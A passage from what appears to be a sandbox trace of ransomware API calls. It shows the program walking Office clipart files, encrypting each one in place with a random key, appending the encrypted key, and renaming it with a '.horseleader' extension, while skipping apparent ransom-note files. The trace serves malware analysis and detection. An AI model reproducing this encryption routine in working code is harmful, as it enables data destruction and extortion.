lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.649] CloseHandle (hObject=0x158) returned 1 [0253.649] GetProcessHeap () returned 0x780000 [0253.649] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.649] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.horseleader") returned 79 [0253.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.horseleader")) returned 1 [0253.650] GetProcessHeap () returned 0x780000 [0253.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.650] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6395c300, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6395c300, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f26, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00092_.WMF", cAlternateFileName="")) returned 1 [0253.650] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="Windows") returned -1 [0253.651] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0253.651] StrStrIW (lpFirst="BS00092_.WMF", lpSrch=".horseleader") returned 0x0 [0253.651] lstrcmpW (lpString1="BS00092_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.651] lstrcmpW (lpString1="BS00092_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.651] lstrlenW (lpString=".testttjffg") returned 11 [0253.651] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.651] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.651] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0253.652] StrStrW (lpFirst="BS00092_.WMF", lpSrch=".txt") returned 0x0 [0253.652] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7974) returned 1 [0253.652] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f26, lpOverlapped=0x0) returned 1 [0253.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.654] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f26, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f26, lpOverlapped=0x0) returned 1 [0253.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.654] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.655] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.655] CloseHandle (hObject=0x158) returned 1 [0253.655] GetProcessHeap () returned 0x780000 [0253.655] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.655] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.horseleader") returned 79 [0253.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.horseleader")) returned 1 [0253.656] GetProcessHeap () returned 0x780000 [0253.656] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.656] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60023c00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60023c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00100_.WMF", cAlternateFileName="")) returned 1 [0253.656] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="Windows") returned -1 [0253.656] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0253.656] StrStrIW (lpFirst="BS00100_.WMF", lpSrch=".horseleader") returned 0x0 [0253.656] lstrcmpW (lpString1="BS00100_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.656] lstrcmpW (lpString1="BS00100_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.656] lstrlenW (lpString=".testttjffg") returned 11 [0253.656] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.656] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.656] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.657] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0253.657] StrStrW (lpFirst="BS00100_.WMF", lpSrch=".txt") returned 0x0 [0253.657] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2378) returned 1 [0253.657] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x94a, lpOverlapped=0x0) returned 1 [0253.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6b6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x94a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x94a, lpOverlapped=0x0) returned 1 [0253.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.660] CloseHandle (hObject=0x158) returned 1 [0253.660] GetProcessHeap () returned 0x780000 [0253.660] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.horseleader") returned 79 [0253.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.horseleader")) returned 1 [0253.661] GetProcessHeap () returned 0x780000 [0253.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.661] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6eb500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c6eb500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00135_.WMF", cAlternateFileName="")) returned 1 [0253.661] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="Windows") returned -1 [0253.661] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0253.661] StrStrIW (lpFirst="BS00135_.WMF", lpSrch=".horseleader") returned 0x0 [0253.661] lstrcmpW (lpString1="BS00135_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.661] lstrcmpW (lpString1="BS00135_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.661] lstrlenW (lpString=".testttjffg") returned 11 [0253.661] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.661] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.661] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0253.661] StrStrW (lpFirst="BS00135_.WMF", lpSrch=".txt") returned 0x0 [0253.661] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1044) returned 1 [0253.662] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x414, lpOverlapped=0x0) returned 1 [0253.663] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.663] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x414, lpOverlapped=0x0) returned 1 [0253.663] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.664] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.664] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.664] CloseHandle (hObject=0x158) returned 1 [0253.664] GetProcessHeap () returned 0x780000 [0253.664] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.664] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.horseleader") returned 79 [0253.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.horseleader")) returned 1 [0253.665] GetProcessHeap () returned 0x780000 [0253.665] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.665] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5295200, ftCreationTime.dwHighDateTime=0x1bd4b23, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc5295200, ftLastWriteTime.dwHighDateTime=0x1bd4b23, nFileSizeHigh=0x0, nFileSizeLow=0x876, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00136_.WMF", cAlternateFileName="")) returned 1 [0253.665] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="Windows") returned -1 [0253.665] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0253.665] StrStrIW (lpFirst="BS00136_.WMF", lpSrch=".horseleader") returned 0x0 [0253.665] lstrcmpW (lpString1="BS00136_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.665] lstrcmpW (lpString1="BS00136_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.665] lstrlenW (lpString=".testttjffg") returned 11 [0253.665] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0253.665] StrStrW (lpFirst="BS00136_.WMF", lpSrch=".txt") returned 0x0 [0253.665] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2166) returned 1 [0253.666] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x876, lpOverlapped=0x0) returned 1 [0253.668] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff78a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x876, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x876, lpOverlapped=0x0) returned 1 [0253.668] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.668] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.668] CloseHandle (hObject=0x158) returned 1 [0253.668] GetProcessHeap () returned 0x780000 [0253.668] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.668] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.horseleader") returned 79 [0253.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.horseleader")) returned 1 [0253.669] GetProcessHeap () returned 0x780000 [0253.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.669] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99a2a00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99a2a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00145_.WMF", cAlternateFileName="")) returned 1 [0253.669] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="Windows") returned -1 [0253.669] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0253.669] StrStrIW (lpFirst="BS00145_.WMF", lpSrch=".horseleader") returned 0x0 [0253.669] lstrcmpW (lpString1="BS00145_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.669] lstrcmpW (lpString1="BS00145_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.669] lstrlenW (lpString=".testttjffg") returned 11 [0253.669] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.669] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0253.671] StrStrW (lpFirst="BS00145_.WMF", lpSrch=".txt") returned 0x0 [0253.671] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1712) returned 1 [0253.671] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6b0, lpOverlapped=0x0) returned 1 [0253.673] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff950, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6b0, lpOverlapped=0x0) returned 1 [0253.673] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.673] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.673] CloseHandle (hObject=0x158) returned 1 [0253.673] GetProcessHeap () returned 0x780000 [0253.673] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.horseleader") returned 79 [0253.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.horseleader")) returned 1 [0253.674] GetProcessHeap () returned 0x780000 [0253.674] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.674] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca47100, ftCreationTime.dwHighDateTime=0x1bd4af0, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7ca47100, ftLastWriteTime.dwHighDateTime=0x1bd4af0, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00174_.WMF", cAlternateFileName="")) returned 1 [0253.674] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="Windows") returned -1 [0253.674] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 67 [0253.674] StrStrIW (lpFirst="BS00174_.WMF", lpSrch=".horseleader") returned 0x0 [0253.674] lstrcmpW (lpString1="BS00174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.674] lstrcmpW (lpString1="BS00174_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.674] lstrlenW (lpString=".testttjffg") returned 11 [0253.674] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.674] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.674] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 